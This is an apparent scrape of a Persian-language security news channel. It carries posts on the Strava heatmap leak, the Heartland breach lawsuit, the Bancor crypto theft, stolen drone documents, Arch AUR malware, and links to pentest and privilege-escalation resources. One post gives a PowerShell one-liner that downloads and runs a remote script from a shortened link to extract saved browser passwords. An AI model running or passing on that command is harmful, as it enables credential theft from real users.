امنیت اطلاعات
نرم افزار ورزشی Strava اخیرا نقشه گرمایی از کاربرانش منتشر کرده که در آن ساختار پایگاه های نظامی در جهان نیز به وضوح قابل مشاهده است. این اتفاق پس از استفاده سربازان از این برنامه رخ داده است. به گفته یکی از سخنگویان، ارتش امریکا تاکنون از این نقشه گرمایی…
جزییاتی جدید از برنامه ورزشی Strava که نقشه پابلیک آن و نمایش دادن کاربران و مسیرهای طی شده آنان توسط این برنامه، باعث شد که پایگاه های نظامی و مراکز هسته ای و امنیتی فراوانی که اغلب در کشورهای غربی وجود داشتند شناسایی شده و کارکنان این مراکز نیز در معرض خطر سوء استفاده قرار گیرند.
اطلاعات بیشتر را در لینک زیر مطالعه کنید:
https://decorrespondent.nl/8481/heres-how-we-found-the-names-and-addresses-of-soldiers-and-secret-agents-using-a-simple-fitness-app/412999257-6756ba27
#usa
#nsa
#surveillance
#military
#news
@sec_nerd
اطلاعات بیشتر را در لینک زیر مطالعه کنید:
https://decorrespondent.nl/8481/heres-how-we-found-the-names-and-addresses-of-soldiers-and-secret-agents-using-a-simple-fitness-app/412999257-6756ba27
#usa
#nsa
#surveillance
#military
#news
@sec_nerd
De Correspondent
Here’s how we found the names and addresses of soldiers and secret agents using a simple fitness app
How can a simple running app let you identify military personnel, intelligence operatives, and other users – and even pinpoint their home address? In this piece, we explain step by step how we were able to do it.
credgrap_ie_edge.ps1
507 B
اسکریپت پاورشل برای استخراج پسوردهای ذخیره شده در اینترنت اکسپلورر و Edge
دستور:
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/2K75g15’)"
@sec_nerd
دستور:
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/2K75g15’)"
@sec_nerd
در سال ۲۰۰۹ کمپانی Heartland توسط هکری مورد حمله قرار گرفت و اطلاعات بیش از ۱۰۰ میلیون کارت اعتباری توسط مهاجم به سرقت رفت. این هک که جزو بزرگترین حملات قرن بیستم به حساب می آید هزینه های زیادی را برای هارتلند به همراه داشت و در مجموع بیش از ۱۴۸ میلیون دلار برای برخی فرآیندهای قانونی، بدهی به مشتریان و غیره هزینه شد.
از آنجایی که هارتلند توسط دو شرکت دیگر بیمه شده بود، خسارت های ناشی از این حمله توسط این دو شرکت به هارتلند پرداخت شد و یکی از این دو شرکت مبلغ ۲۰ میلیون و دیگری ۱۰ میلیون دلار از هزینه های هارتلند را جبران کردند.
اما اکنون پس از گذشت ۹ سال این دو شرکت بیمه با شکایت از شرکت امنیتی که هارتلند با آن قرارداد داشت، سعی دارند پول های از دست رفته خود را برگردانند. آنها معتقدند شرکت امنیتی مذکور به درستی به تعهدی که در قرارداد به آن اشاره شده ، پایبند نبوده است.
شرکتهای بیمه اعلام کرده اند که شرکت Trustwave در شناسایی حمله تزریق SQL که در سال ۲۰۰۷ علیه هارتلند رخ داده بود اهمال کرده است.
همچنین تراست ویو از تشخیص نصب بدافزار بر روی سرورهای پرداخت در سال ۲۰۰۸ نیز ناتوان بوده و هیچ هشداری را در این خصوص منتشر نکرده است.
همچنین Visa اعلام کرده است که تایید تراست ویو مبنی بر سازگاری هارتلند با استاندارد PCI DSS (خلاصه The Payment Card Industry Data Security Standard) نیز درست نبوده و احتمال محکوم شدن تراست ویو بسیار زیاد است.
از سوی دیگر اما تراست ویو اعتقادی به این مطالب ندارد و این موضوع را یک داستان قدیمی میداند.
شایان ذکر است که تراست ویو پیش از این در کیس های مشابهی مورد شکایت قرار گرفته است.
منبع:
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
#news
#breach
#usa
@sec_nerd
از آنجایی که هارتلند توسط دو شرکت دیگر بیمه شده بود، خسارت های ناشی از این حمله توسط این دو شرکت به هارتلند پرداخت شد و یکی از این دو شرکت مبلغ ۲۰ میلیون و دیگری ۱۰ میلیون دلار از هزینه های هارتلند را جبران کردند.
اما اکنون پس از گذشت ۹ سال این دو شرکت بیمه با شکایت از شرکت امنیتی که هارتلند با آن قرارداد داشت، سعی دارند پول های از دست رفته خود را برگردانند. آنها معتقدند شرکت امنیتی مذکور به درستی به تعهدی که در قرارداد به آن اشاره شده ، پایبند نبوده است.
شرکتهای بیمه اعلام کرده اند که شرکت Trustwave در شناسایی حمله تزریق SQL که در سال ۲۰۰۷ علیه هارتلند رخ داده بود اهمال کرده است.
همچنین تراست ویو از تشخیص نصب بدافزار بر روی سرورهای پرداخت در سال ۲۰۰۸ نیز ناتوان بوده و هیچ هشداری را در این خصوص منتشر نکرده است.
همچنین Visa اعلام کرده است که تایید تراست ویو مبنی بر سازگاری هارتلند با استاندارد PCI DSS (خلاصه The Payment Card Industry Data Security Standard) نیز درست نبوده و احتمال محکوم شدن تراست ویو بسیار زیاد است.
از سوی دیگر اما تراست ویو اعتقادی به این مطالب ندارد و این موضوع را یک داستان قدیمی میداند.
شایان ذکر است که تراست ویو پیش از این در کیس های مشابهی مورد شکایت قرار گرفته است.
منبع:
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
#news
#breach
#usa
@sec_nerd
BleepingComputer
Security Firm Sued for Failing to Detect Malware That Caused a 2009 Breach
Two insurance companies are suing a cyber-security firm to recover insurance fees paid to a customer after the security firm failed to detect malware on the client's network for months, an issue that led to one of the biggest security breaches of the 2000s.…
شناسایی تحرکات مخرب در powershell با استفاده از تکنیکهای یادگیری ماشین
https://bit.ly/2u9jecw
#ps
#ml
#windows
@sec_nerd
https://bit.ly/2u9jecw
#ps
#ml
#windows
@sec_nerd
کارتهای تبریک(ضمیمه های ایمیلی) روز استقلال امریکا حاوی تروجانهای بانکی بوده است.
جزییات:
https://bit.ly/2zmtPG6
#news
#phishing
#malware
@sec_nerd
جزییات:
https://bit.ly/2zmtPG6
#news
#phishing
#malware
@sec_nerd
هکرها معادل 13.5 میلیون دلار ارز دیجیتال از صرافی آنلاین اسراییلی Bancor به سرقت بردند.
هکرها با دسترسی به والت این شرکت 24984 اتریوم (معادل 12.5 میلیون دلار) و تعداد 229356645 سکه Pundi X را به والت خود منتقل کردند.
https://www.bleepingcomputer.com/news/security/hacker-steals-135-million-from-bancor-cryptocurrency-exchange/
#news
#breach
#btc
#cryptocurrency
@sec_nerd
هکرها با دسترسی به والت این شرکت 24984 اتریوم (معادل 12.5 میلیون دلار) و تعداد 229356645 سکه Pundi X را به والت خود منتقل کردند.
https://www.bleepingcomputer.com/news/security/hacker-steals-135-million-from-bancor-cryptocurrency-exchange/
#news
#breach
#btc
#cryptocurrency
@sec_nerd
BleepingComputer
Hacker Steals $13.5 Million From Bancor Cryptocurrency Exchange
In a statement published hours ago, Israeli-based cryptocurrency exchange Bancor fessed up to a security incident following which a hacker made off with roughly $13.5 million worth of cryptocurrency.
یک هکر اطلاعات پهپادهای نظامی امریکا را در دارک وب به قیمت ۲۰۰ دلار به فروش گذاشت!
این اطلاعات با استفاده از یک آسیب پذیری در روترهای Netgear که پیش از این اکسپلویت آن منتشر شده است، از دو سیستم ماموران نظامی امریکا در پایگاه هوایی Creech در نوادا به سرقت رفت.
این اسناد دارای طبقه بندی بسیار بالایی نیستند اما میتوان از آنها برای فهم نقاط ضعف و قابلیتهای یکی از پیشرفته ترین پهپادهای جهان بهره برد.
اطلاعات بیشتر:
https://www.forbes.com/sites/thomasbrewster/2018/07/11/a-hacker-sold-u-s-military-drone-documents-on-the-dark-web-for-just-200/amp
#news
#breach
#usa
#military
#cia
#network
#netgear
@sec_nerd
این اطلاعات با استفاده از یک آسیب پذیری در روترهای Netgear که پیش از این اکسپلویت آن منتشر شده است، از دو سیستم ماموران نظامی امریکا در پایگاه هوایی Creech در نوادا به سرقت رفت.
این اسناد دارای طبقه بندی بسیار بالایی نیستند اما میتوان از آنها برای فهم نقاط ضعف و قابلیتهای یکی از پیشرفته ترین پهپادهای جهان بهره برد.
اطلاعات بیشتر:
https://www.forbes.com/sites/thomasbrewster/2018/07/11/a-hacker-sold-u-s-military-drone-documents-on-the-dark-web-for-just-200/amp
#news
#breach
#usa
#military
#cia
#network
#netgear
@sec_nerd
Forbes
A Hacker Sold U.S. Military Drone Documents On The Dark Web For Just $200
Can the U.S. government be trusted to keep sensitive data secure? Leaked docs included military advice on defeating improvised explosive devices and Reaper drone manuals, according to cybersecurity researchers.
p1285-duA.pdf
1.8 MB
ابزار OSINT برای جستجو در متون وبسایت pastebin.com
https://github.com/needmorecowbell/sniff-paste
#pastebin
#osint
#enum
@sec_nerd
https://github.com/needmorecowbell/sniff-paste
#pastebin
#osint
#enum
@sec_nerd
GitHub
GitHub - needmorecowbell/sniff-paste: Pastebin OSINT Harvester
Pastebin OSINT Harvester. Contribute to needmorecowbell/sniff-paste development by creating an account on GitHub.
بالابردن سطح دسترسی در سیستم عاملهای لینوکسی
https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html
#linux
#privesc
@sec_nerd
https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html
#linux
#privesc
@sec_nerd
ریپوزیتوری کاربران لینوکس Arch به بدافزار آلوده شد.
برنامه acroread که برای نمایش فایلهای pdf کاربرد دارد، در ریپوزیتوری که در کنترل کاربران این لینوکس است توسط کاربری با نام xeactor منتشر شد که در کامیت گیت این پکیج، کد آسیب زننده ای وجود دارد که یک اسکریپت curl را از سرور دیگری دانلود و اجرا میکند.
این اسکریپت، برنامه ای نصب میکند که systemd را دوباره پیکربندی میکند و هر ۳۶۰ ثانیه یکبار اجرا میشود.
اسکریپت مذکور اقدام به جمع آوری اطلاعات از سیستم آلوده کرده و نتایج آن را در یک پست در pastebin ارسال میکند.
منبع:
https://thehackernews.com/2018/07/arch-linux-aur-malware.html
#news
#arch
#linux
#malware
@sec_nerd
برنامه acroread که برای نمایش فایلهای pdf کاربرد دارد، در ریپوزیتوری که در کنترل کاربران این لینوکس است توسط کاربری با نام xeactor منتشر شد که در کامیت گیت این پکیج، کد آسیب زننده ای وجود دارد که یک اسکریپت curl را از سرور دیگری دانلود و اجرا میکند.
این اسکریپت، برنامه ای نصب میکند که systemd را دوباره پیکربندی میکند و هر ۳۶۰ ثانیه یکبار اجرا میشود.
اسکریپت مذکور اقدام به جمع آوری اطلاعات از سیستم آلوده کرده و نتایج آن را در یک پست در pastebin ارسال میکند.
منبع:
https://thehackernews.com/2018/07/arch-linux-aur-malware.html
#news
#arch
#linux
#malware
@sec_nerd
امنیت اطلاعات
یک هکر اطلاعات پهپادهای نظامی امریکا را در دارک وب به قیمت ۲۰۰ دلار به فروش گذاشت! این اطلاعات با استفاده از یک آسیب پذیری در روترهای Netgear که پیش از این اکسپلویت آن منتشر شده است، از دو سیستم ماموران نظامی امریکا در پایگاه هوایی Creech در نوادا به سرقت…
اخبار دیگری در خصوص این حمله منتشر شده است که نشان میدهد آسیب پذیری موجود در روتر netgear مربوط به سال ۲۰۱۶ است که در آن نام کاربری و پسورد پیش فرض دستگاه توسط هکرها مورد سوء استفاده قرار گرفته است.
هکرها از این روتر برای عملیات pivoting و ورود به شبکه داخلی بهره برده اند و با دسترسی به کامپیوتر فرمانده، اطلاعات پهپاد MQ-9 Reaper و برخی افراد هدایت کننده آن را بدست آوردند.
این پهپاد توسط نیروی هوایی، نیروی دریایی، CIA، آژانس های حفاظت از مرزها، ناسا و برخی ارتش های کشورهای دیگر مورد استفاده قرار میگیرد.
منبع:
https://www.bleepingcomputer.com/news/security/hacker-steals-military-docs-because-someone-didn-t-change-a-default-ftp-password/
#news
#breach
#usa
#military
#cia
#network
#netgear
#pivoting
@sec_nerd
هکرها از این روتر برای عملیات pivoting و ورود به شبکه داخلی بهره برده اند و با دسترسی به کامپیوتر فرمانده، اطلاعات پهپاد MQ-9 Reaper و برخی افراد هدایت کننده آن را بدست آوردند.
این پهپاد توسط نیروی هوایی، نیروی دریایی، CIA، آژانس های حفاظت از مرزها، ناسا و برخی ارتش های کشورهای دیگر مورد استفاده قرار میگیرد.
منبع:
https://www.bleepingcomputer.com/news/security/hacker-steals-military-docs-because-someone-didn-t-change-a-default-ftp-password/
#news
#breach
#usa
#military
#cia
#network
#netgear
#pivoting
@sec_nerd
BleepingComputer
Hacker Steals Military Docs Because Someone Didn’t Change a Default FTP Password
A hacker is selling sensitive military documents on online hacking forums, a security firm has discovered.
محققان مک آفی در تحقیقات خود از فروشگاه های دارک وب، وبسایتی را پیدا کردند که دسترسی RDP به سیستم های یک فرودگاه بزرگ بین المللی را با قیمت ناچیز ۱۰ دلار به فروش گذاشته است!
این حساب ها دسترسی ادمین دارند و سیستم های مذکور قابلیت کنترل دوربین های مداربسته را نیز دارا هستند.
منبع:
https://thehackernews.com/2018/07/rdp-shop-dark-web.html
#news
#darknet
@sec_nerd
این حساب ها دسترسی ادمین دارند و سیستم های مذکور قابلیت کنترل دوربین های مداربسته را نیز دارا هستند.
منبع:
https://thehackernews.com/2018/07/rdp-shop-dark-web.html
#news
#darknet
@sec_nerd
لینوکس آسیب پذیر برای تمرین افزایش سطح دسترسی به روت
https://bit.ly/2LeIXH7
#linux
#ctf
#privesc
@sec_nerd
https://bit.ly/2LeIXH7
#linux
#ctf
#privesc
@sec_nerd
کشف دایرکتوری های وب بدون نیاز به بروت فورس
https://github.com/Nekmo/dirhunt
#web
#pentest
#enum
@sec_nerd
https://github.com/Nekmo/dirhunt
#web
#pentest
#enum
@sec_nerd